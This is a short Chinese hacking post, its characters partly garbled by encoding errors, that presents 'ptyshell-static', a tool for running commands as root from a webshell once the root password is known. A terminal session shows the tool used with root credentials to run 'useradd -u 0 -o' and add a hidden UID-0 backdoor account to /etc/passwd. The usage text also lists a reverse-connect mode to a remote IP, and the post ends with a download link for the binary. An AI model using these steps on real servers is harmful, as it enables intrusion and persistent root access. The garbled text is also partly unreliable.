一個(gè)知道root密碼可以在webshell里面執(zhí)行命令的程序

一個(gè)知道root密碼可以在webshell里面執(zhí)行命令的程序[test@localhost tmp]$ ls -l total 488 -rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static [test@localhost tmp]$ md5sum ptyshell-static 3ea2a909f736660097c0248d403bbe80 ptyshell-static [test@localhost tmp]$ ./ptyshell-static ptyshell v0.4 orignal written by wzt ,psexec feature added by xi4oyu usage: ./ptyshell-static <port> <remote ip> <port> ./ptyshell-static -u username -p password -c command -pd port 使用方法： [test@localhost tmp]$ ./ptyshell-static 4444 [test@localhost tmp]$ grep xxoxx /et c/passwd [test@localhost tmp]$ ./ptyshell-static -u root -p test -c useradd -u 0 -o xxoxx -dp 4444 Beginning to send command! [test@localhost tmp]$ grep xxoxx /et c/passwd xxoxx:x:0:510::/home/xxoxx:/bi n/bash [test@localhost tmp]$ 執(zhí)行第二個(gè)命令的時(shí)候需要等待幾秒， 以后的命令執(zhí)行都不需要再執(zhí)行./ptyshell-stat 4444了。 直接執(zhí)行第二個(gè)命令就行。 注意命令用包含起來， 命令表太長了， 哈哈， 否則不能執(zhí)行可別怪我。 這里webshell里面也可以執(zhí)行的， 一個(gè)道理， 呵呵。 純屬2B之作， 大家隨便玩玩。 感謝tr寶寶提供空間 http://www.pcsec.orghttp://img6.22122511.com/upload/net_2/2008/12/ptyshell-static.rar